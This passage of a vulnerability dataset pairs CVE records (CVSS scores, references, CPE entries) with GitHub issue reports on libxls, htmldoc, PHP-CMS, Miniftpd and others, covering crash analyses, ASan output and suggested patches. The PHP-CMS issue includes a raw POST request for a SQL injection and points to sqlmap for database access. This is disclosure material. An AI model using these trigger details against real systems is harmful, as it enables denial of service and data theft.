"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/Renleilei1992/Linux_Network_Project/issues/1 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"Renleilei1992",
"Linux_Network_Project"
] | 客户端注册用户,输入新密码,未对密码的长度进行校验,存在栈溢出漏洞

| client 注册用户信息,存在栈溢出漏洞 | https://api.github.com/repos/Renleilei1992/Linux_Network_Project/issues/1/comments | 0 | 2020-06-18T17:00:10Z | 2020-06-18T17:00:10Z | https://github.com/Renleilei1992/Linux_Network_Project/issues/1 | 641,396,611 | 1 | 2,752 |
CVE-2021-27836 | 2021-11-03T17:15:08.337 | An issue was discoverered in in function xls_getWorkSheet in xls.c in libxls 1.6.2, allows attackers to cause a denial of service, via a crafted XLS file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/libxls/libxls/issues/94"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5D7XXCVFYRRMI4ENXYSD3MZEBS6SMI7E/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SFOE4Z6T46LA47VXWUVET4ELXRZQ3BWB/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Y6XOTFEOCHYKZAFCB6H3KNIIFJ3UFV7V/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/libxls/libxls/issues/94"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5D7XXCVFYRRMI4ENXYSD3MZEBS6SMI7E/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SFOE4Z6T46LA47VXWUVET4ELXRZQ3BWB/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Y6XOTFEOCHYKZAFCB6H3KNIIFJ3UFV7V/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libxls_project:libxls:1.6.2:-:*:*:*:*:*:*",
"matchCriteriaId": "2E85B8CD-C2ED-4D2E-AAEA-D902317DE6F0",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*",
"matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
"matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
"matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/libxls/libxls/issues/94 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"libxls",
"libxls"
] | # libxls xls_parseWorkSheet() - NULL pointer dereference
## INTRODUCTION
A NULL pointer dereference vulnerability has been detected in the function `xls_parseWorkSheet()` when trying to access the `rdi` register that is NULL at that time.
Looking at the code we can realize it is because of trying to access `long offset = pWS->filepos;` to that pointer, which is the argument for the function.
The argument for `xls_parseWorkSheet()` comes from the return value of `xls_getWorkSheet()`:
```c
pWS = xls_getWorkSheet(pWB, i);
xls_parseWorkSheet(pWS);
```
If we enter the function `xls_getWorkSheet()`:
```c
xlsWorkSheet * xls_getWorkSheet(xlsWorkBook* pWB,int num)
{
xlsWorkSheet * pWS = NULL;
verbose ("xls_getWorkSheet");
if (num >= 0 && num < (int)pWB->sheets.count) {
pWS = calloc(1, sizeof(xlsWorkSheet));
pWS->filepos=pWB->sheets.sheet[num].filepos;
pWS->workbook=pWB;
pWS->rows.lastcol=0;
pWS->rows.lastrow=0;
pWS->colinfo.count=0;
}
return pWS;
}
```
We can easily deduce that if either `num` is less than 0, or `num` is greater than `pWB->sheets.count` the conditional won't succeed, thus returning `pWS` directly without assigning it a heap chunk.
As the pointer has been initialized with NULL, a NULL pointer is returned, which will be the argument for the next function, and the program will crash when trying to access it.
## REPRODUCE
To reproduce this crash, the `test2_libxls` file has been used with a specially crafted XLS file.
The crafted file needs to have no `BoundSheet8` records to make `pWB->sheets.count` be 0.
```
root@ubuntu:/software/libxls-1.6.2# .libs/test2_libxls min/crash.xls
ole2_open: min/crash.xls
libxls : xls_open_ole
libxls : xls_parseWorkBook
----------------------------------------------
libxls : BOF
ID: 3030h Unknown ()
Size: 16
Not Processed in parseWoorkBook(): BOF=0x3030 size=16
----------------------------------------------
libxls : BOF
ID: 3030h Unknown ()
Size: 2
Not Processed in parseWoorkBook(): BOF=0x3030 size=2
----------------------------------------------
libxls : BOF
ID: 3030h Unknown ()
Size: 2
Not Processed in parseWoorkBook(): BOF=0x3030 size=2
----------------------------------------------
libxls : BOF
ID: 3030h Unknown ()
Size: 0
Not Processed in parseWoorkBook(): BOF=0x3030 size=0
----------------------------------------------
libxls : BOF
ID: 3030h Unknown ()
Size: 112
Not Processed in parseWoorkBook(): BOF=0x3030 size=112
----------------------------------------------
libxls : BOF
ID: 3030h Unknown ()
Size: 48
Not Processed in parseWoorkBook(): BOF=0x3030 size=48
----------------------------------------------
libxls : BOF
ID: 3030h Unknown ()
Size: 48
Not Processed in parseWoorkBook(): BOF=0x3030 size=48
----------------------------------------------
libxls : BOF
ID: 3030h Unknown ()
Size: 2
Not Processed in parseWoorkBook(): BOF=0x3030 size=2
----------------------------------------------
libxls : BOF
ID: 3030h Unknown ()
Size: 2
Not Processed in parseWoorkBook(): BOF=0x3030 size=2
----------------------------------------------
libxls : BOF
ID: 3030h Unknown ()
Size: 48
Not Processed in parseWoorkBook(): BOF=0x3030 size=48
----------------------------------------------
libxls : BOF
ID: 3030h Unknown ()
Size: 49
Not Processed in parseWoorkBook(): BOF=0x3030 size=49
----------------------------------------------
libxls : BOF
ID: 3030h Unknown ()
Size: 26880
Not Processed in parseWoorkBook(): BOF=0x3030 size=26880
----------------------------------------------
libxls : BOF
ID: 3030h Unknown ()
Size: 12336
Not Processed in parseWoorkBook(): BOF=0x3030 size=12336
----------------------------------------------
libxls : BOF
ID: 3030h Unknown ()
Size: 12336
Not Processed in parseWoorkBook(): BOF=0x3030 size=12336
----------------------------------------------
libxls : BOF
ID: 3030h Unknown ()
Size: 12336
Not Processed in parseWoorkBook(): BOF=0x3030 size=12336
----------------------------------------------
libxls : BOF
ID: 3030h Unknown ()
Size: 12336
Not Processed in parseWoorkBook(): BOF=0x3030 size=12336
----------------------------------------------
libxls : BOF
ID: 3030h Unknown ()
Size: 12336
Not Processed in parseWoorkBook(): BOF=0x3030 size=12336
----------------------------------------------
libxls : BOF
ID: 3030h Unknown ()
Size: 12336
Not Processed in parseWoorkBook(): BOF=0x3030 size=12336
----------------------------------------------
libxls : BOF
ID: 3030h Unknown ()
Size: 12336
Not Processed in parseWoorkBook(): BOF=0x3030 size=12336
----------------------------------------------
libxls : BOF
ID: 000Ah EOF (End of File)
Size: 48
libxls : xls_getWorkSheet
Segmentation fault
```
## ANALYSIS
As I explained in the Introduction section, we need `num` to be less than 0 or greater than `pWB->sheets.count`. Having one (or both) of those requirements can trigger the NULL pointer dereference.
In `main()`:
```c
for (i = 0; i < pWB->sheets.count; i++) {
int isFirstLine = 1;
```
The first condition will never fail as `i` will always be greater or equal to 0.
Also, `i` cannot be greater than `pWB->sheets.count` as depends on it's value to be incremented.
But... what if `pWB->sheets.count` is equal to 0? Then `i` will be 0 too.
In the conditional `i` won't be less than `pWB->sheets.count`, but equal, thus failing the conditional.
The function `xls_addSheet()`, responsible for incrementing the `pWB->sheets.count` value is never executed with the current PoC xls file, thus keeping until crash time the value which the program gave it when being initialized at `xls_open_ole()`:
```c
pWB->sheets.count=0;
pWB->xfs.count=0;
pWB->fonts.count=0;
pWB->charset = strdup(charset ? charset : "UTF-8");
```
But how do we make the program to not execute `xls_addSheet()` ?
We initially need to avoid any `XLS_RECORD_BOUNDSHEET` record.
If we craft an XLS file that do not contain any `BoundSheet8` record, this code will never reached:
```c
case XLS_RECORD_BOUNDSHEET:
{
//printf("ADD SHEET\n");
BOUNDSHEET *bs = (BOUNDSHEET *)buf;
xlsConvertBoundsheet(bs);
// different for BIFF5 and BIFF8
if ((retval = xls_addSheet(pWB, bs, bof1.size)) != LIBXLS_OK) {
goto cleanup;
}
}
break;
```
And `pWB->sheets.count` will be 0 when reaching the conditional code.
The result is a SIGSEGV (Segmentation fault) interruption crashing the program trying to access non-mapped memory:
```
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "test2_libxls", stopped 0x7ffff7fab7cd in xls_parseWorkSheet (), reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x7ffff7fab7cd → xls_parseWorkSheet(pWS=0x0)
[#1] 0x555555555545 → main(argc=<optimized out>, argv=0x7fffffffe378)
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤ p pWS
$9 = (xlsWorkSheet *) 0x0
gef➤ x/i $rip
=> 0x7ffff7fab7cd <xls_parseWorkSheet+77>: mov rdx,QWORD PTR [rdi+0x18]
gef➤
```
## IMPACT
The most common issue with this type of vulnerability is a Denial of Service (DoS) once a crash has been triggered as demonstrated above with the crash PoC.
## SOLUTION
A solution for this issue could be adding a pointer check before using it, and change the actions once a pointer is detected to be NULL.
Patch example:
```c
xls_error_t xls_parseWorkSheet(xlsWorkSheet* pWS)
{
BOF tmp;
BYTE* buf = NULL;
/* --- PATCH START --- */
if(pWS == NULL)
return -1; // or any value to be checked from the parent function when failing
/* --- PATCH END --- */
long offset = pWS->filepos;
size_t read;
xls_error_t retval = 0;
struct st_cell_data *cell = NULL;
xlsWorkBook *pWB = pWS->workbook;
verbose ("xls_parseWorkSheet");
if ((retval = xls_preparseWorkSheet(pWS)) != LIBXLS_OK) {
goto cleanup;
}
// printf("size=%d fatpos=%d)\n", pWS->workbook->olestr->size, pWS->workbook->olestr->fatpos);
if ((retval = xls_makeTable(pWS)) != LIBXLS_OK) {
goto cleanup;
}
```
Obviously, the pointer is used multiple times in the code, so having it NULL is something not expected. A more complex patch is needed to avoid unexpected results for the next functions to be executed instead of just returning if a NULL pointer is detected.
Anyway, a better solution for this patch is update the conditional at `xls_getWorkSheet()` to this:
```c
if (num >= 0 && num <= (int)pWB->sheets.count) {
```
This time, if `num` is equal to `pWB->sheets.count` the heap chunk will be returned avoiding a NULL pointer being returned.
| libxls test.c and test2.c - NULL pointer dereference vulnerability due to xls_parseWorkSheet() misuse | https://api.github.com/repos/libxls/libxls/issues/94/comments | 3 | 2021-02-26T19:58:44Z | 2021-03-02T19:36:53Z | https://github.com/libxls/libxls/issues/94 | 817,625,319 | 94 | 2,753 |
CVE-2021-40985 | 2021-11-03T17:15:08.387 | A stack-based buffer under-read in htmldoc before 1.9.12, allows attackers to cause a denial of service via a crafted BMP image to image_load_bmp. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/michaelrsweet/htmldoc/commit/f12b9666e582a8e7b70f11b28e5ffc49ad625d43"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/michaelrsweet/htmldoc/issues/444"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/02/msg00022.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/michaelrsweet/htmldoc/commit/f12b9666e582a8e7b70f11b28e5ffc49ad625d43"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/michaelrsweet/htmldoc/issues/444"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/02/msg00022.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:htmldoc_project:htmldoc:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8D1CE1F4-17A1-430E-9C8B-0CE88A07514B",
"versionEndExcluding": "1.9.12",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"125"
] | 125 | https://github.com/michaelrsweet/htmldoc/issues/444 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"michaelrsweet",
"htmldoc"
] | os: ubuntu 20.04
htmldoc version: master branch
command : ./htmldoc --webpage -f out.pdf ./poc.html
[poc.zip](https://github.com/michaelrsweet/htmldoc/files/6915210/poc.zip)
asan report
```
=================================================================
==100970==ERROR: AddressSanitizer: stack-buffer-underflow on address 0x7ffd98c936be at pc 0x000000605f03 bp 0x7ffd98c93690 sp 0x7ffd98c93688
READ of size 1 at 0x7ffd98c936be thread T0
#0 0x605f02 in image_load_bmp(image_t*, _IO_FILE*, int, int) /home/ubuntu/fuzz/htmldocc/htmldoc/image.cxx:1089:12
#1 0x602b94 in image_load /home/ubuntu/fuzz/htmldocc/htmldoc/image.cxx:831:14
#2 0x53bc18 in write_image(_IO_FILE*, render_str*, int) /home/ubuntu/fuzz/htmldocc/htmldoc/ps-pdf.cxx:10305:5
#3 0x5207fa in pdf_write_document(unsigned char*, unsigned char*, unsigned char*, unsigned char*, unsigned char*, unsigned char*, tree_str*, tree_str*) /home/ubuntu/fuzz/htmldocc/htmldoc/ps-pdf.cxx:2292:7
#4 0x50c977 in pspdf_export /home/ubuntu/fuzz/htmldocc/htmldoc/ps-pdf.cxx:910:7
#5 0x4e1663 in main /home/ubuntu/fuzz/htmldocc/htmldoc/htmldoc.cxx:1291:3
#6 0x7ff2c1e7d0b2 in __libc_start_main /build/glibc-YbNSs7/glibc-2.31/csu/../csu/libc-start.c:308:16
#7 0x41eadd in _start (/home/ubuntu/fuzz/htmldocc/htmldoc/htmldoc+0x41eadd)
Address 0x7ffd98c936be is located in stack of thread T0 at offset 30 in frame
#0 0x6048ef in image_load_bmp(image_t*, _IO_FILE*, int, int) /home/ubuntu/fuzz/htmldocc/htmldoc/image.cxx:881
This frame has 1 object(s):
[32, 1056) 'colormap' (line 894) <== Memory access at offset 30 underflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-underflow /home/ubuntu/fuzz/htmldocc/htmldoc/image.cxx:1089:12 in image_load_bmp(image_t*, _IO_FILE*, int, int)
Shadow bytes around the buggy address:
0x10003318a680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10003318a690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10003318a6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10003318a6b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10003318a6c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x10003318a6d0: 00 00 00 00 f1 f1 f1[f1]00 00 00 00 00 00 00 00
0x10003318a6e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10003318a6f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10003318a700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10003318a710: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10003318a720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==100970==ABORTING
``` | stack-buffer-underflow in htmldoc | https://api.github.com/repos/michaelrsweet/htmldoc/issues/444/comments | 2 | 2021-08-02T07:44:48Z | 2021-11-08T01:45:06Z | https://github.com/michaelrsweet/htmldoc/issues/444 | 957,859,917 | 444 | 2,754 |
CVE-2020-18263 | 2021-11-03T18:15:07.953 | PHP-CMS v1.0 was discovered to contain a SQL injection vulnerability in the component search.php via the search parameter. This vulnerability allows attackers to access sensitive database information. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/harshitbansal373/PHP-CMS/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/harshitbansal373/PHP-CMS/issues/1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:php-cms_project:php-cms:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA113E26-6E50-41D9-8696-9674DDCC34F5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/harshitbansal373/PHP-CMS/issues/1 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"harshitbansal373",
"PHP-CMS"
] | In search.php,there's a SQL injection vulnerability in parameter,search.This parameter is transmitted using POST,you can use sqlmap to enter the database.
```
POST /search.php HTTP/1.1
Host: localhost:8082
Connection: keep-alive
Content-Length: 18
Cache-Control: max-age=0
Origin: http://localhost:8082
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://localhost:8082/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=h0vvq91s3j8aq77qsjmdbbt8vq
search=111&submit=
```
[](https://i.loli.net/2019/06/14/5d03689aec07666393.png)
[](https://i.loli.net/2019/06/14/5d03689ac9d8e12257.png)
[](https://i.loli.net/2019/06/14/5d03689ab659a44855.png) | SQL injection vulnerability in search.php | https://api.github.com/repos/harshitbansal373/PHP-CMS/issues/1/comments | 0 | 2019-06-14T09:29:32Z | 2019-06-14T09:29:32Z | https://github.com/harshitbansal373/PHP-CMS/issues/1 | 456,150,677 | 1 | 2,755 |
CVE-2021-42624 | 2021-11-04T11:15:07.640 | A local buffer overflow vulnerability exists in the latest version of Miniftpd in ftpproto.c through the tmp variable, where a crafted payload can be sent to the affected function. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Gabe-commiter/Miniftpd/issues/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Gabe-commiter/Miniftpd/issues/4"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:miniftpd_project:miniftpd:-:*:*:*:*:*:*:*",
"matchCriteriaId": "A4D33EF1-0E4E-4005-B938-D75E8BAA31F9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/Gabe-commiter/Miniftpd/issues/4 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"Gabe-commiter",
"Miniftpd"
] | Hi @Gabe-commiter,
I found a issue, that can trigger buffer overflow on your application. The issue exists on list_common() function (from line 437 to 484) on ftpproto.c
By reading line by line, we can see you using sprintf() in your application. The problem appears when you defined buf and tmp variables both have 1024 length. Along with off's size = len(sprint()) so anytime you is using off += sprintf(), offset will be increased. Finally you get input from tmp to buf is trigger bufferoverflow.
```
void list_common(session_t *sess)
{
DIR *dir = opendir(".");
if (dir == NULL)
{
return;
}
struct dirent *dt;
struct stat sbuf;
while ((dt = readdir(dir)) != NULL)
{
if (lstat(dt->d_name, &sbuf) < 0)
{
continue;
}
if (dt->d_name[0] == '.')
{
continue;
}
char buf[1024] = {0}; //Defined buf's size is 1024
const char *perms = statbuf_get_perms(&sbuf);
int off = 0;
off += sprintf(buf, "%s ", perms); // Define off size
off += sprintf(buf + off, " %3d %-8d %-8d ", (int)sbuf.st_nlink, sbuf.st_uid, sbuf.st_gid);// Define next write position to avoid overwriting
off += sprintf(buf + off, "%8lu ", (unsigned long)sbuf.st_size);
const char *datebuf = statbuf_get_date(&sbuf);
off += sprintf(buf + off, "%s ", datebuf);
if (S_ISLNK(sbuf.st_mode))
{
char tmp[1024] = {0}; // Defined tmp's size is 1024
readlink(dt->d_name, tmp, sizeof(tmp)); //Get tmp with sizeof(tmp), max is 1024 from path in dt->d_name
off += sprintf(buf + off, "%s -> %s\r\n", dt->d_name, tmp); // Read tmp to buf with max size is 1024, and buf max size is also 1024 so trigger bufferoverflow
}
else
{
off += sprintf(buf + off, "%s\r\n", dt->d_name);
}
writen(sess->data_fd, buf, strlen(buf));
}
closedir(dir);
}
```
Exploit:
sprintf() on line 473 read tmp and dt->name data in format defined before. But with data already written in from previous code, we can only write 1024 - off bytes. In case tmp have maximum size, input read into buf += 1024 + "\n\r" + leng(dt->name). It will trigger bufferoverflow.
Solution :
Please limit maximum input characters in snprintf().
Defined buff's maximum size is equal to the sum of the variables's size concatenated with the snprintf(). | sprintf() trigger buffer overflow on list_common() function | https://api.github.com/repos/Gabe-commiter/Miniftpd/issues/4/comments | 0 | 2021-10-13T12:01:47Z | 2021-10-13T12:02:45Z | https://github.com/Gabe-commiter/Miniftpd/issues/4 | 1,025,158,824 | 4 | 2,756 |
CVE-2021-42057 | 2021-11-04T21:15:09.080 | Obsidian Dataview through 0.4.12-hotfix1 allows eval injection. The evalInContext function in executes user input, which allows an attacker to craft malicious Markdown files that will execute arbitrary code once opened. NOTE: 0.4.13 provides a mitigation for some use cases. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 10,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
